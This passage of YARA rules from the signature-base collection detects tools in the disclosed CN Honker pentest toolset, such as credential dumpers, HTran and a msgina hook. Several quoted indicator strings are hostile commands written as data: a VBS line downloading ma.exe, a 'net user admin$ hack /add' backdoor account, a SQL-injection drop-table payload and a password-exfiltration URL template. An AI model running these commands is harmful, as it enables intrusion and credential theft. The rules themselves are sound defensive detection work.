      description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 50
      hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
      id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
   strings:
      $s1 = "Unable to create TCP listen socket. %s%d" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "http://www.foundstone.com" fullword ascii
      $s3 = "%s %s port %d. Address is already in use" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 20KB and all of them
}
Sample from CN Honker Pentest Toolset - file GetHashes.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_GetHashes {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
      id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
   strings:
      $s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 87KB and 2 of them
}
Sample from CN Honker Pentest Toolset - file GetHashes.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_GetHashes_2 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
      id = "31117d2e-caf1-58c9-8525-b40b73097928"
   strings:
      $s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "GetHashes.exe $Local" fullword ascii
      $s3 = "The system key doesn't match SAM registry file!" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 300KB and 2 of them
}
CN_Honker_GetPass_GetPass
Sample from CN Honker Pentest Toolset - file GetPass.exe
source signature-base
author Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_GetPass_GetPass {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
strings:
$s1 = "\\only\\Desktop\\" ascii
$s2 = "To Run As Administuor" ascii /* PEStudio Blacklist: strings */
$s3 = "Key to EXIT ... & pause > nul" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
CN_Honker_GetSyskey
Sample from CN Honker Pentest Toolset - file GetSyskey.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_GetSyskey {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
strings:
$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "The system key file \"%s\" is created." fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 40KB and all of them
}
CN_Honker_GetWebShell
Sample from CN Honker Pentest Toolset - file GetWebShell.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_GetWebShell {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
id = "919883f4-af66-5d07-ad41-8cba3e049396"
strings:
$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */
$s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */
$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 70KB and 1 of them
}
CN_Honker_GroupPolicyRemover
Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_GroupPolicyRemover {
meta:
description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "7475d694e189b35899a2baa462957ac3687513e5"
id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
strings:
$s0 = "GP_killer.EXE" fullword wide /* PEStudio Blacklist: strings */
$s1 = "GP_killer Microsoft " fullword wide /* PEStudio Blacklist: strings */
$s2 = "SHDeleteKeyA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 79 times */
condition:
uint16(0) == 0x5a4d and filesize < 700KB and all of them
}
CN_Honker_HASH_32
Sample from CN Honker Pentest Toolset - file 32.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_HASH_32 {
meta:
description = "Sample from CN Honker Pentest Toolset - file 32.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
strings:
$s5 = "[Undefined OS version] Major: %d Minor: %d" fullword ascii
$s8 = "Try To Run As Administrator ..." fullword ascii /* PEStudio Blacklist: strings */
$s9 = "Specific LUID NOT found" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 240KB and all of them
}
CN_Honker_HASH_PwDump7
Sample from CN Honker Pentest Toolset - file PwDump7.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_HASH_PwDump7 {
meta:
description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
strings:
$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "No Users key!" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "NO PASSWORD*********************:" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Unable to dump file %S" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 380KB and all of them
}
CN_Honker_HASH_pwhash
Sample from CN Honker Pentest Toolset - file pwhash.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_HASH_pwhash {
meta:
description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "689056588f95749f0382d201fac8f58bac393e98"
id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
strings:
$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them
}
CN_Honker_HTran2_4
Sample from CN Honker Pentest Toolset - file HTran2.4.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_HTran2_4 {
meta:
description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "524f986692f55620013ab5a06bf942382e64d38a"
id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
strings:
$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "[+] New connection %s:%d !!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 180KB and all of them
}
CN_Honker_Happy_Happy
Sample from CN Honker Pentest Toolset - file Happy.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Happy_Happy {
meta:
description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2023-01-27"
score = 70
hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
id = "6e6c806d-e784-507f-b327-3b9f2510422b"
strings:
$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide /* PEStudio Blacklist: strings */
$s2 = "domainscan.exe" fullword wide /* PEStudio Blacklist: strings */
$s3 = "http://www.happysec.com/" wide
$s4 = "cmdshell" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 655KB and 2 of them
}
CN_Honker_Havij_Havij
Sample from CN Honker Pentest Toolset - file Havij.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Havij_Havij {
meta:
description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
strings:
$s1 = "User-Agent: %Inject_Here%" fullword wide /* PEStudio Blacklist: strings */
$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}
CN_Honker_HconSTFportable
Sample from CN Honker Pentest Toolset - file HconSTFportable.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_HconSTFportable {
meta:
description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
strings:
$s1 = "HconSTFportable.exe" fullword wide /* PEStudio Blacklist: strings */
$s2 = "www.Hcon.in" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 354KB and all of them
}
CN_Honker_Hookmsgina
Sample from CN Honker Pentest Toolset - file Hookmsgina.dll
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Hookmsgina {
meta:
description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
strings:
$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "Global\\WinlogonHack_Load%u" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
CN_Honker_Htran_V2_40_htran20
Sample from CN Honker Pentest Toolset - file htran20.exe
source signature-base
author Florian Roth (Nextron Systems)
rule CN_Honker_Htran_V2_40_htran20 {
meta:
description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
strings:
$s1 = "%s -slave ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "[SERVER]connection to %s:%d error" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "%s -connect ConnectHost [ConnectPort] Default:%d" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "[+] got, ip:%s, port:%d" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "[-] There is a error...Create a new connection." fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them
}